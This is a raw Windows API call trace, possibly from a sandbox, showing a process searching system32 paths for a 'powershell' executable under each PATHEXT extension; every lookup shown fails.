	[0350.910] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0350.912] SetErrorMode (uMode=0x1) returned 0x1
	[0350.914] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0350.924] SetErrorMode (uMode=0x1) returned 0x1
	[0351.224] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0351.224] SetErrorMode (uMode=0x1) returned 0x1
	[0351.225] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0351.236] SetErrorMode (uMode=0x1) returned 0x1
	[0351.237] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0351.237] SetErrorMode (uMode=0x1) returned 0x1
	[0351.237] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0351.244] SetErrorMode (uMode=0x1) returned 0x1
	[0351.249] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0351.249] SetErrorMode (uMode=0x1) returned 0x1
	[0351.249] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0351.256] SetErrorMode (uMode=0x1) returned 0x1
	[0351.257] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0351.257] SetErrorMode (uMode=0x1) returned 0x1
	[0351.257] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0351.548] SetErrorMode (uMode=0x1) returned 0x1
	[0351.549] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0351.549] SetErrorMode (uMode=0x1) returned 0x1
	[0351.549] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0351.558] SetErrorMode (uMode=0x1) returned 0x1
	[0351.559] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0351.559] SetErrorMode (uMode=0x1) returned 0x1
	[0351.559] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0351.567] SetErrorMode (uMode=0x1) returned 0x1
	[0351.568] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0351.569] SetErrorMode (uMode=0x1) returned 0x1
	[0351.569] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0351.577] SetErrorMode (uMode=0x1) returned 0x1
	[0351.578] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0351.578] SetErrorMode (uMode=0x1) returned 0x1
	[0351.578] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.069] SetErrorMode (uMode=0x1) returned 0x1
	[0352.070] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0352.070] SetErrorMode (uMode=0x1) returned 0x1
	[0352.070] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.077] SetErrorMode (uMode=0x1) returned 0x1
	[0352.078] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0352.078] SetErrorMode (uMode=0x1) returned 0x1
	[0352.078] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.085] SetErrorMode (uMode=0x1) returned 0x1
	[0352.086] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0352.086] SetErrorMode (uMode=0x1) returned 0x1
	[0352.086] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.094] SetErrorMode (uMode=0x1) returned 0x1
	[0352.095] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0352.095] SetErrorMode (uMode=0x1) returned 0x1
	[0352.095] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.102] SetErrorMode (uMode=0x1) returned 0x1
	[0352.103] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0352.103] SetErrorMode (uMode=0x1) returned 0x1
	[0352.103] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.110] SetErrorMode (uMode=0x1) returned 0x1
	[0352.574] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0352.574] SetErrorMode (uMode=0x1) returned 0x1
	[0352.574] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.581] SetErrorMode (uMode=0x1) returned 0x1
	[0352.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0352.583] SetErrorMode (uMode=0x1) returned 0x1
	[0352.583] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.583] SetErrorMode (uMode=0x1) returned 0x1
	[0352.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0352.584] SetErrorMode (uMode=0x1) returned 0x1
	[0352.584] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.584] SetErrorMode (uMode=0x1) returned 0x1
	[0352.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0352.584] SetErrorMode (uMode=0x1) returned 0x1
	[0352.584] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.584] SetErrorMode (uMode=0x1) returned 0x1
	[0352.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0352.585] SetErrorMode (uMode=0x1) returned 0x1
	[0352.585] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.585] SetErrorMode (uMode=0x1) returned 0x1
	[0352.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0352.585] SetErrorMode (uMode=0x1) returned 0x1
	[0352.585] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.586] SetErrorMode (uMode=0x1) returned 0x1
	[0352.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0352.586] SetErrorMode (uMode=0x1) returned 0x1
	[0352.586] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.586] SetErrorMode (uMode=0x1) returned 0x1
	[0352.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0352.586] SetErrorMode (uMode=0x1) returned 0x1
	[0352.586] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.587] SetErrorMode (uMode=0x1) returned 0x1
	[0352.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0352.587] SetErrorMode (uMode=0x1) returned 0x1
	[0352.587] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.587] SetErrorMode (uMode=0x1) returned 0x1
	[0352.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0352.587] SetErrorMode (uMode=0x1) returned 0x1
	[0352.587] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.588] SetErrorMode (uMode=0x1) returned 0x1
	[0352.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0352.588] SetErrorMode (uMode=0x1) returned 0x1
	[0352.588] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.588] SetErrorMode (uMode=0x1) returned 0x1
	[0352.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0352.588] SetErrorMode (uMode=0x1) returned 0x1
	[0352.588] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.589] SetErrorMode (uMode=0x1) returned 0x1
	[0352.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0352.589] SetErrorMode (uMode=0x1) returned 0x1
	[0352.589] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.589] SetErrorMode (uMode=0x1) returned 0x1
	[0352.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0352.589] SetErrorMode (uMode=0x1) returned 0x1
	[0352.589] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c88dca0 | out: lpFindFileData=0x1c88dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.590] SetErrorMode (uMode=0x1) returned 0x1
	[0352.590] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c88db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0352.590] SetErrorMode (uMode=0x1) returned 0x1
